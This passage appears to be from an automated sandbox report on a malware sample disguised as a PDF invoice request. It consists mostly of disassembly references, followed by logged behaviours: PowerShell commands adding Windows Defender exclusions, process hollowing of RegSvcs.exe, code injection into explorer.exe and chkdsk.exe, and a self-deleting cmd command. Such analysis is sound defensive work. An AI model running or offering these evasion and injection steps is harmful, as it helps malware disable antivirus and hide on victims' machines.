            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8E9E0 mov eax, dword ptr fs:[00000030h]19_2_00F8E9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]19_2_00F0A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]19_2_00F0A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]19_2_00F0A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]19_2_00F0A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]19_2_00F0A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]19_2_00F0A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F349D0 mov eax, dword ptr fs:[00000030h]19_2_00F349D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCA9D3 mov eax, dword ptr fs:[00000030h]19_2_00FCA9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F969C0 mov eax, dword ptr fs:[00000030h]19_2_00F969C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F889B3 mov esi, dword ptr fs:[00000030h]19_2_00F889B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F889B3 mov eax, dword ptr fs:[00000030h]19_2_00F889B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F889B3 mov eax, dword ptr fs:[00000030h]19_2_00F889B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]19_2_00F129A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F009AD mov eax, dword ptr fs:[00000030h]19_2_00F009AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F009AD mov eax, dword ptr fs:[00000030h]19_2_00F009AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA4978 mov eax, dword ptr fs:[00000030h]19_2_00FA4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA4978 mov eax, dword ptr fs:[00000030h]19_2_00FA4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8C97C mov eax, dword ptr fs:[00000030h]19_2_00F8C97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F26962 mov eax, dword ptr fs:[00000030h]19_2_00F26962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F26962 mov eax, dword ptr fs:[00000030h]19_2_00F26962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F26962 mov eax, dword ptr fs:[00000030h]19_2_00F26962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F4096E mov eax, dword ptr fs:[00000030h]19_2_00F4096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F4096E mov edx, dword ptr fs:[00000030h]19_2_00F4096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F4096E mov eax, dword ptr fs:[00000030h]19_2_00F4096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4940 mov eax, dword ptr fs:[00000030h]19_2_00FD4940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F80946 mov eax, dword ptr fs:[00000030h]19_2_00F80946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8892A mov eax, dword ptr fs:[00000030h]19_2_00F8892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F9892B mov eax, dword ptr fs:[00000030h]19_2_00F9892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8C912 mov eax, dword ptr fs:[00000030h]19_2_00F8C912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF8918 mov eax, dword ptr fs:[00000030h]19_2_00EF8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF8918 mov eax, dword ptr fs:[00000030h]19_2_00EF8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E908 mov eax, dword ptr fs:[00000030h]19_2_00F7E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7E908 mov eax, dword ptr fs:[00000030h]19_2_00F7E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3AAEE mov eax, dword ptr fs:[00000030h]19_2_00F3AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3AAEE mov eax, dword ptr fs:[00000030h]19_2_00F3AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F00AD0 mov eax, dword ptr fs:[00000030h]19_2_00F00AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F34AD0 mov eax, dword ptr fs:[00000030h]19_2_00F34AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F34AD0 mov eax, dword ptr fs:[00000030h]19_2_00F34AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F56ACC mov eax, dword ptr fs:[00000030h]19_2_00F56ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F56ACC mov eax, dword ptr fs:[00000030h]19_2_00F56ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F56ACC mov eax, dword ptr fs:[00000030h]19_2_00F56ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F08AA0 mov eax, dword ptr fs:[00000030h]19_2_00F08AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F08AA0 mov eax, dword ptr fs:[00000030h]19_2_00F08AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F56AA4 mov eax, dword ptr fs:[00000030h]19_2_00F56AA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F38A90 mov edx, dword ptr fs:[00000030h]19_2_00F38A90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]19_2_00F0EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD4A80 mov eax, dword ptr fs:[00000030h]19_2_00FD4A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7CA72 mov eax, dword ptr fs:[00000030h]19_2_00F7CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F7CA72 mov eax, dword ptr fs:[00000030h]19_2_00F7CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAEA60 mov eax, dword ptr fs:[00000030h]19_2_00FAEA60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3CA6F mov eax, dword ptr fs:[00000030h]19_2_00F3CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3CA6F mov eax, dword ptr fs:[00000030h]19_2_00F3CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3CA6F mov eax, dword ptr fs:[00000030h]19_2_00F3CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]19_2_00F06A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]19_2_00F06A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]19_2_00F06A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]19_2_00F06A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]19_2_00F06A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]19_2_00F06A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F06A50 mov eax, dword ptr fs:[00000030h]19_2_00F06A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10A5B mov eax, dword ptr fs:[00000030h]19_2_00F10A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10A5B mov eax, dword ptr fs:[00000030h]19_2_00F10A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F24A35 mov eax, dword ptr fs:[00000030h]19_2_00F24A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F24A35 mov eax, dword ptr fs:[00000030h]19_2_00F24A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3CA38 mov eax, dword ptr fs:[00000030h]19_2_00F3CA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F3CA24 mov eax, dword ptr fs:[00000030h]19_2_00F3CA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2EA2E mov eax, dword ptr fs:[00000030h]19_2_00F2EA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8CA11 mov eax, dword ptr fs:[00000030h]19_2_00F8CA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F08BF0 mov eax, dword ptr fs:[00000030h]19_2_00F08BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F08BF0 mov eax, dword ptr fs:[00000030h]19_2_00F08BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F08BF0 mov eax, dword ptr fs:[00000030h]19_2_00F08BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F8CBF0 mov eax, dword ptr fs:[00000030h]19_2_00F8CBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2EBFC mov eax, dword ptr fs:[00000030h]19_2_00F2EBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAEBD0 mov eax, dword ptr fs:[00000030h]19_2_00FAEBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F20BCB mov eax, dword ptr fs:[00000030h]19_2_00F20BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F20BCB mov eax, dword ptr fs:[00000030h]19_2_00F20BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F20BCB mov eax, dword ptr fs:[00000030h]19_2_00F20BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F00BCD mov eax, dword ptr fs:[00000030h]19_2_00F00BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F00BCD mov eax, dword ptr fs:[00000030h]19_2_00F00BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F00BCD mov eax, dword ptr fs:[00000030h]19_2_00F00BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB4BB0 mov eax, dword ptr fs:[00000030h]19_2_00FB4BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB4BB0 mov eax, dword ptr fs:[00000030h]19_2_00FB4BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10BBE mov eax, dword ptr fs:[00000030h]19_2_00F10BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F10BBE mov eax, dword ptr fs:[00000030h]19_2_00F10BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFCB7E mov eax, dword ptr fs:[00000030h]19_2_00EFCB7E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FAEB50 mov eax, dword ptr fs:[00000030h]19_2_00FAEB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD2B57 mov eax, dword ptr fs:[00000030h]19_2_00FD2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD2B57 mov eax, dword ptr fs:[00000030h]19_2_00FD2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD2B57 mov eax, dword ptr fs:[00000030h]19_2_00FD2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FD2B57 mov eax, dword ptr fs:[00000030h]19_2_00FD2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB4B4B mov eax, dword ptr fs:[00000030h]19_2_00FB4B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FB4B4B mov eax, dword ptr fs:[00000030h]19_2_00FB4B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA8B42 mov eax, dword ptr fs:[00000030h]19_2_00FA8B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F96B40 mov eax, dword ptr fs:[00000030h]19_2_00F96B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F96B40 mov eax, dword ptr fs:[00000030h]19_2_00F96B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FCAB40 mov eax, dword ptr fs:[00000030h]19_2_00FCAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF8B50 mov eax, dword ptr fs:[00000030h]19_2_00EF8B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2EB20 mov eax, dword ptr fs:[00000030h]19_2_00F2EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2EB20 mov eax, dword ptr fs:[00000030h]19_2_00F2EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00402B7C GetProcessHeap,RtlAllocateHeap,15_2_00402B7C
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3504
            Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3504
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: BA0000
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 887008Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 745008Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe" Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: explorer.exe, 00000014.00000002.3749287712.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1335993488.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000014.00000003.2297215475.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3749287712.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000014.00000002.3749287712.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1335993488.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000014.00000002.3749287712.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.1335993488.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000014.00000000.1334199504.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3741150645.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
